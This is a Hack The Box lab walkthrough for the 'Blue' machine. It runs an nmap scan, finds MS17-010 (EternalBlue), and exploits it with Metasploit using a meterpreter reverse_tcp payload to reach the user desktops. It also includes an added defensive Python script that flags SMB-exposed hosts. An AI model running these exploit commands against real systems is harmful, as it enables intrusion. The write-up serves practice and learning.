Hey guys! Today I’m going to write a walkthrough for Hack The Box.
The targeted machine is Blue.
When I saw the words “Blue” and “Windows”, it rang a bell.
Let’s proceed for the time being.
01-nmap
Run nmap to scan the machine.
#nmap -sV -sS -Pn -oN blueHTB blue.htb
Nmap scan report for blue.htb (10.10.10.40)
Host is up (0.16s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
It is a good idea to add the target to the hosts file in advance.
#vi /etc/hosts
10.10.10.40 blue.htb
The scan results show that ports 139 and 445 are open. Investigate further for vulnerabilities.
#nmap --script vuln blue.htb
smb-vuln-ms17-010 is VULNERABLE.
The vulnerability is commonly known as “Eternal Blue”, which is where this machine gets its name.
Eternal Blue became famous in 2017 when it was used by the ransomware “WannaCry”.
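From the defender's side, the same saved scan output (the file written by -oN) can be triaged for hosts that expose SMB and so need their MS17-010 patch status confirmed. This is an added example, not part of the original walkthrough; the function names are assumptions, and the sample is the scan output shown above trimmed to four ports.

```python
import re

# Scan output from the page's `nmap -oN` file, trimmed to four ports.
SAMPLE = """\
Nmap scan report for blue.htb (10.10.10.40)
Host is up (0.16s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
"""

SMB_PORTS = {139, 445}  # NetBIOS session service and SMB over TCP
HOST_RE = re.compile(r"^Nmap scan report for (?:(\S+) \((\S+)\)|(\S+))$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_nmap_normal(text):
    """Return {host: [(port, proto, state, service, version), ...]}."""
    hosts, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = HOST_RE.match(line)
        if m:
            # "name (ip)" when a hostname was given, otherwise the bare address
            current = f"{m.group(1)} ({m.group(2)})" if m.group(1) else m.group(3)
            hosts[current] = []
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            port, proto, state, service, version = m.groups()
            hosts[current].append((int(port), proto, state, service, version))
    return hosts

def smb_exposure(hosts):
    """List hosts with an open SMB port, for MS17-010 patch verification."""
    findings = []
    for host, ports in hosts.items():
        exposed = sorted(p for p, proto, state, _, _ in ports
                         if proto == "tcp" and state == "open" and p in SMB_PORTS)
        if exposed:
            findings.append((host, exposed))
    return findings

if __name__ == "__main__":
    for host, ports in smb_exposure(parse_nmap_normal(SAMPLE)):
        print(f"{host}: SMB reachable on {ports}; confirm the MS17-010 update is installed")
```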
02-msf
Attack the discovered vulnerability.
# msfconsole
msf5 > search ms17-010
msf5 > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts blue.htb
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.14.41
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
The Meterpreter shell has started.
I didn’t understand how to use Meterpreter, so I had a hard time.
I referred to this page.
meterpreter > pwd
C:\Windows\system32
meterpreter > cd ../..
meterpreter > cd Users
meterpreter > dir
I found an administrator.
The flag was on each user’s desktop.
Thank you for reading.